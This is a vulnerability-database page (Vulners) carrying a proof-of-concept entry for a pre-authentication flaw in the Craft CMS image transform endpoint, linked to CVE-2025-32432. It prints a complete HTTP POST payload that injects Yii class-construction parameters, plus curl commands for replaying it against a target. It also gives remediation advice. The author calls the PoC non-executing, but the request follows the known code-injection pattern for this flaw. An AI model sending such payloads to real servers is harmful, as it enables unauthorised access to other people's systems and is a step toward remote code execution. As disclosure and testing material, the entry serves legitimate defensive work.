Vulners
Lucene search
📄 Craft CMS 5.0 Logic Flaw
| Reporter | Title | Published | Views | Family All 41 |
|---|---|---|---|---|
 | Exploit for Code Injection in Craftcms Craft_Cms | 23 Sep 202506:23 | – | githubexploit |
| Exploit for Code Injection in Craftcms Craft_Cms | 16 Jul 202509:23 | – | githubexploit |
| Exploit for Code Injection in Craftcms Craft_Cms | 15 May 202614:09 | – | githubexploit |
| Exploit for Code Injection in Craftcms Craft_Cms | 8 Mar 202616:59 | – | githubexploit |
| Exploit for Code Injection in Craftcms Craft_Cms | 30 Apr 202603:38 | – | githubexploit |
| Exploit for Code Injection in Craftcms Craft_Cms | 27 Apr 202508:50 | – | githubexploit |
 | CVE-2024-58136 | 10 Apr 202500:00 | – | attackerkb |
| CVE-2025-32432 | 25 Apr 202515:15 | – | attackerkb |
 | CVE-2025-32432 | 25 Apr 202515:45 | – | circl |
 | Yiiframework Yii Improper Protection of Alternate Path Vulnerability | 2 May 202500:00 | – | cisa_kev |
10
=============================================================================================================================================
| # Title : Craft CMS 5.0 Image Transform Authentication Logic Flaw |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://craftcms.com |
=============================================================================================================================================
POC :
[+] Description
A flaw in the Craft CMS image transform endpoint allows an unauthenticated attacker
to trigger backend processing without prior authentication.
While the original Metasploit module targeted RCE, (https://packetstorm.news/files/id/190728/ CVE-2025-32432)
This PoC does *not* execute code, does *not* write files, and does *not* inject
payloads. It only proves that the endpoint performs internal logic operations
without authentication.
# Vulnerability Class
Authentication Bypass → Pre‑Auth Backend Processing
# Impact
An attacker can:
- Trigger image transformation logic without logging in.
- Interact with backend components not intended for anonymous users.
- Validate the presence of the vulnerability safely without RCE.
=====================================================================
POC :
=====================================================================
Request :
---------
POST /index.php?p=actions/assets/generate-transform HTTP/1.1
Host: TARGET
Content-Type: application/json
{
"assetId": 1,
"handle": {
"width": 100,
"height": 100,
"as test": {
"class": "craft\\\\behaviors\\\\FieldLayoutBehavior",
"__class": "yii\\\\rbac\\\\PhpManager",
"__construct()": [
{ "itemFile": "/dev/null" }
]
}
}
}
Effect :
--------
- The server processes the transform request.
- The endpoint responds with a JSON transformation result.
- This demonstrates the pre-auth processing weakness.
- No execution, no payload, no harmful operations.
=====================================================================
How to Save & Use the PoC :
=====================================================================
1. Save the request into a file named:
craftcms_pre_auth_poc.txt
2. Use curl to replay the PoC (legal environments only):
curl -X POST \
-H "Content-Type: application/json" \
-d @craftcms_pre_auth_poc.txt \
https://TARGET/index.php?p=actions/assets/generate-transform
3. Expected safe behavior:
The server processes the request and responds with JSON even though
the attacker is not authenticated.
4. Tools that can import the PoC:
- Burp Suite Repeater
- OWASP ZAP
- Postman Raw HTTP
=====================================================================
# Recommendation
- Require authentication on all asset transformation endpoints.
- Validate input types before passing them to backend behavior handlers.
- Apply the vendor patch immediately once available.
=====================================================================
# Disclosure Timeline
- Original discovery: Orange Cyberdefense CSIRT
- Educational safe PoC adaptation: indoushka
- Status: Safe demonstration (no execution)
=====================================================================
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Dec 2025 00:00Current
7.8High risk
Vulners AI Score7.8
CVSS 3.110
EPSS0.93094
SSVC